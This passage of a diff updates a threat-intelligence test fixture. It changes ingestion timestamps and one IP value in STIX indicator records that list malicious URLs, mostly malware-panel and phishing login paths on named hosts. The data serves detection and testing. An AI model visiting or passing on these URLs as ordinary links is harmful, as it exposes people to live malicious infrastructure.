CyberCrime\",\"id\":\"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:22.703Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:22.703Z\"}", "category": "threat", "type": "indicator", @@ -23779,7 +23779,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388247020Z", + "ingested": "2021-12-13T08:38:40.025528400Z", "original": "{\"created\":\"2020-02-20T05:18:31.965Z\",\"description\":\"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:31.965Z\",\"name\":\"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.965Z\"}", "category": "threat", "type": "indicator", @@ -23831,7 +23831,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388251959Z", + "ingested": "2021-12-13T08:38:40.025535800Z", "original": "{\"created\":\"2020-02-20T05:18:31.986Z\",\"description\":\"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:31.986Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.986Z\"}", "category": "threat", "type": "indicator", @@ -23883,7 +23883,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388257429Z", + "ingested": "2021-12-13T08:38:40.025543Z", "original": "{\"created\":\"2020-02-20T05:18:33.111Z\",\"description\":\"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-20T05:18:33.111Z\",\"name\":\"mal_url: http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:33.111Z\"}", "category": "threat", "type": "indicator", @@ -23934,7 +23934,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388262749Z", + "ingested": "2021-12-13T08:38:40.025550100Z", "original": "{\"created\":\"2020-02-20T05:18:47.389Z\",\"description\":\"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-20T05:18:47.389Z\",\"name\":\"mal_url: http://rds2020.space/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rds2020.space/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.389Z\"}", "category": "threat", "type": "indicator", @@ -23985,7 +23985,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388267678Z", + "ingested": "2021-12-13T08:38:40.025557400Z", "original": "{\"created\":\"2020-02-20T05:18:47.406Z\",\"description\":\"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d723c08e-997d-483e-91e0-2ba6048e3683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-20T05:18:47.406Z\",\"name\":\"mal_url: http://vysyyvyvm.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vysyyvyvm.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.406Z\"}", "category": "threat", "type": "indicator", @@ -24037,7 +24037,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388272778Z", + "ingested": "2021-12-13T08:38:40.025564600Z", "original": "{\"created\":\"2020-02-20T05:18:47.424Z\",\"description\":\"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:18:47.424Z\",\"name\":\"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.424Z\"}", "category": "threat", "type": "indicator", @@ -24089,7 +24089,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388277928Z", + "ingested": "2021-12-13T08:38:40.025571700Z", "original": "{\"created\":\"2020-02-20T05:18:52.122Z\",\"description\":\"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-20T05:18:52.122Z\",\"name\":\"mal_url: http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tailuong.com.vn/.gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:52.122Z\"}", "category": "threat", "type": "indicator", @@ -24141,7 +24141,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388282757Z", + "ingested": "2021-12-13T08:38:40.025578900Z", "original": "{\"created\":\"2020-02-20T05:19:37.033Z\",\"description\":\"TS ID: 55328307484; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--4c7e5535-9899-4967-86bb-e303b03a1122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:19:37.033Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work3/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.033Z\"}", "category": "threat", "type": "indicator", @@ -24193,7 +24193,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388287476Z", + "ingested": "2021-12-13T08:38:40.025586200Z", "original": "{\"created\":\"2020-02-20T05:19:37.099Z\",\"description\":\"TS ID: 55328307477; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ea537667-1f37-4050-bb51-85fee813e39c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:37.099Z\",\"name\":\"mal_url: http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/duck/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:37.099Z\"}", "category": "threat", "type": "indicator", @@ -24245,7 +24245,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388292094Z", + "ingested": "2021-12-13T08:38:40.025593500Z", "original": "{\"created\":\"2020-02-20T05:19:44.991Z\",\"description\":\"TS ID: 55328307478; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--b6919ef9-68eb-48f5-9bc5-cdb35182e3d5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:19:44.991Z\",\"name\":\"mal_url: http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dull/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:44.991Z\"}", "category": "threat", "type": "indicator", @@ -24296,7 +24296,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388296633Z", + "ingested": "2021-12-13T08:38:40.025669400Z", "original": "{\"created\":\"2020-02-20T05:19:49.844Z\",\"description\":\"TS ID: 55330801566; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--ddf3b3c7-d5f7-42d7-b013-767315de4745\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-20T05:19:49.844Z\",\"name\":\"mal_url: http://f0404175.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404175.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:49.844Z\"}", "category": "threat", "type": "indicator", @@ -24348,7 +24348,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388302764Z", + "ingested": "2021-12-13T08:38:40.025695300Z", "original": "{\"created\":\"2020-02-20T05:19:58.679Z\",\"description\":\"TS ID: 55330801607; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--12edd75d-2558-498f-93a6-b628c3a21f85\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:19:58.679Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:19:58.679Z\"}", "category": "threat", "type": "indicator", @@ -24400,7 +24400,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388307633Z", + "ingested": "2021-12-13T08:38:40.025701Z", "original": "{\"created\":\"2020-02-20T05:21:46.589Z\",\"description\":\"TS ID: 55328307479; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--7a99b0ea-a361-4d6f-9c75-a1cd9ac41b1b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:21:46.589Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work8/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:21:46.589Z\"}", "category": "threat", "type": "indicator", @@ -24452,7 +24452,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388312843Z", + "ingested": "2021-12-13T08:38:40.025705200Z", "original": "{\"created\":\"2020-02-20T05:22:19.894Z\",\"description\":\"TS ID: 55330801609; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--09479a9a-0c30-4029-a396-afa64343f065\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:22:19.894Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/em/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/em/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:22:19.894Z\"}", "category": "threat", "type": "indicator", @@ -24503,7 +24503,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388317802Z", + "ingested": "2021-12-13T08:38:40.025709600Z", "original": "{\"created\":\"2020-02-20T05:24:01.214Z\",\"description\":\"TS ID: 55330801569; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--434af7fc-410e-404d-8c8c-8875f92cb0c0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-20T05:24:01.214Z\",\"name\":\"mal_url: http://f0402912.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0402912.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:01.214Z\"}", "category": "threat", "type": "indicator", @@ -24554,7 +24554,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388322431Z", + "ingested": "2021-12-13T08:38:40.025734700Z", "original": "{\"created\":\"2020-02-20T05:24:21.239Z\",\"description\":\"TS ID: 55330801567; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--3ea0e805-8fa3-40ce-84e5-bf39318f35a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:24:21.239Z\",\"name\":\"mal_url: http://f0404052.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0404052.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:21.239Z\"}", "category": "threat", "type": "indicator", @@ -24606,7 +24606,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388327240Z", + "ingested": "2021-12-13T08:38:40.025739600Z", "original": "{\"created\":\"2020-02-20T05:24:33.205Z\",\"description\":\"TS ID: 55330801581; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--b9cccc62-550f-4f5b-bb32-f580c23fe382\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T05:24:33.205Z\",\"name\":\"mal_url: http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/oxo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:33.205Z\"}", "category": "threat", "type": "indicator", @@ -24625,7 +24625,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 193.32.188.146", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-20T05:24:35.843Z", "valid_from": "2020-02-20T05:24:35.843Z", @@ -24647,12 +24647,12 @@ "first_seen": "2020-02-20T05:24:35.843Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "193.32.188.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388332009Z", - "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 193.32.188.146\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '193.32.188.146']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", + "ingested": "2021-12-13T08:38:40.025748800Z", + "original": "{\"created\":\"2020-02-20T05:24:35.843Z\",\"description\":\"TS ID: 55330801559; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--314ecb7a-db3a-4a64-9c0c-1361891c26c3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-20T05:24:35.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:35.843Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -24703,7 +24703,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388336838Z", + "ingested": "2021-12-13T08:38:40.025754Z", "original": "{\"created\":\"2020-02-20T05:24:47.629Z\",\"description\":\"TS ID: 55330801610; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--d594d88f-2e74-4539-99a3-7fc7ae29ac7f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:24:47.629Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/aps/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/aps/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.629Z\"}", "category": "threat", "type": "indicator", @@ -24755,7 +24755,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388341407Z", + "ingested": "2021-12-13T08:38:40.025759800Z", "original": "{\"created\":\"2020-02-20T05:24:47.645Z\",\"description\":\"TS ID: 55330801575; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--d20e7f50-caac-4054-b816-6f4a9a9283b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:24:47.645Z\",\"name\":\"mal_url: http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thefieldagent.net/ys/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:24:47.645Z\"}", "category": "threat", "type": "indicator", @@ -24807,7 +24807,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388346637Z", + "ingested": "2021-12-13T08:38:40.025767Z", "original": "{\"created\":\"2020-02-20T05:25:26.502Z\",\"description\":\"TS ID: 55328307491; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--fb3209c5-4de8-4554-9bb4-ed8cc2b19915\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-20T05:25:26.502Z\",\"name\":\"mal_url: http://instaboom-hello.site/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://instaboom-hello.site/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.502Z\"}", "category": "threat", "type": "indicator", @@ -24859,7 +24859,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388351155Z", + "ingested": "2021-12-13T08:38:40.025773800Z", "original": "{\"created\":\"2020-02-20T05:25:26.525Z\",\"description\":\"TS ID: 55328307488; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--592a57f8-b59a-4018-9167-307225a207ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:25:26.525Z\",\"name\":\"mal_url: http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://biznetvgator.com/greets/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:26.525Z\"}", "category": "threat", "type": "indicator", @@ -24911,7 +24911,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388355533Z", + "ingested": "2021-12-13T08:38:40.025780800Z", "original": "{\"created\":\"2020-02-20T05:25:29.508Z\",\"description\":\"TS ID: 55328307495; iType: mal_url; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime\",\"id\":\"indicator--56e543f4-111a-4764-af25-ee784f35a7c6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:25:29.508Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/azrt/emma/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/azrt/emma/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.508Z\"}", "category": "threat", "type": "indicator", @@ -24963,7 +24963,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388362356Z", + "ingested": "2021-12-13T08:38:40.025787600Z", "original": "{\"created\":\"2020-02-20T05:25:29.532Z\",\"description\":\"TS ID: 55328307487; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a2e1a901-7ad5-4be0-9fad-7e83cb7d35a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-20T05:25:29.532Z\",\"name\":\"mal_url: http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenbrains.xyz/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:25:29.532Z\"}", "category": "threat", "type": "indicator", @@ -25015,7 +25015,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388389577Z", + "ingested": "2021-12-13T08:38:40.025794500Z", "original": "{\"created\":\"2020-02-21T02:51:41.341Z\",\"description\":\"TS ID: 55333174445; iType: mal_url; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--84d5a06f-cbc3-4504-b0d0-ea23b99182ba\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:51:41.341Z\",\"name\":\"mal_url: http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nenengdsa.ug/QnSrw25SkhlxsF5P/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:41.341Z\"}", "category": "threat", "type": "indicator", @@ -25066,7 +25066,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388397642Z", + "ingested": "2021-12-13T08:38:40.025801300Z", "original": "{\"created\":\"2020-02-21T02:51:50.176Z\",\"description\":\"TS ID: 55333174449; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--56cda4af-704b-41e7-8cc3-6140c163a22a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-21T02:51:50.176Z\",\"name\":\"mal_url: http://j1041747.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1041747.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.176Z\"}", "category": "threat", "type": "indicator", @@ -25118,7 +25118,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388403323Z", + "ingested": "2021-12-13T08:38:40.025805300Z", "original": "{\"created\":\"2020-02-21T02:51:50.296Z\",\"description\":\"TS ID: 55333174441; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--3a6903d8-e46b-4918-a99d-21ae21465bde\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-21T02:51:50.296Z\",\"name\":\"mal_url: http://sadhate.zzz.com.ua/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sadhate.zzz.com.ua/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:51:50.296Z\"}", "category": "threat", "type": "indicator", @@ -25170,7 +25170,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388408373Z", + "ingested": "2021-12-13T08:38:40.025810400Z", "original": "{\"created\":\"2020-02-21T02:52:28.296Z\",\"description\":\"TS ID: 55333174457; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ec1f4e5c-0878-4dcf-9141-4a83b8abeb2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-21T02:52:28.296Z\",\"name\":\"mal_url: http://groysman.club/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://groysman.club/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:28.296Z\"}", "category": "threat", "type": "indicator", @@ -25222,7 +25222,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388413061Z", + "ingested": "2021-12-13T08:38:40.025815500Z", "original": "{\"created\":\"2020-02-21T02:52:31.697Z\",\"description\":\"TS ID: 55333174438; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--40502e97-56ae-4194-81d7-fc08ebff68c1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-21T02:52:31.697Z\",\"name\":\"mal_url: http://nortonlilly.info/ace/ts/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace/ts/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:31.697Z\"}", "category": "threat", "type": "indicator", @@ -25274,7 +25274,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388417440Z", + "ingested": "2021-12-13T08:38:40.025837200Z", "original": "{\"created\":\"2020-02-21T02:52:33.704Z\",\"description\":\"TS ID: 55333174439; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d9ed2a5f-0f87-4d87-adec-7a925fc848e4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:52:33.704Z\",\"name\":\"mal_url: http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/cream/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:52:33.704Z\"}", "category": "threat", "type": "indicator", @@ -25293,7 +25293,7 @@ "object_marking_refs": 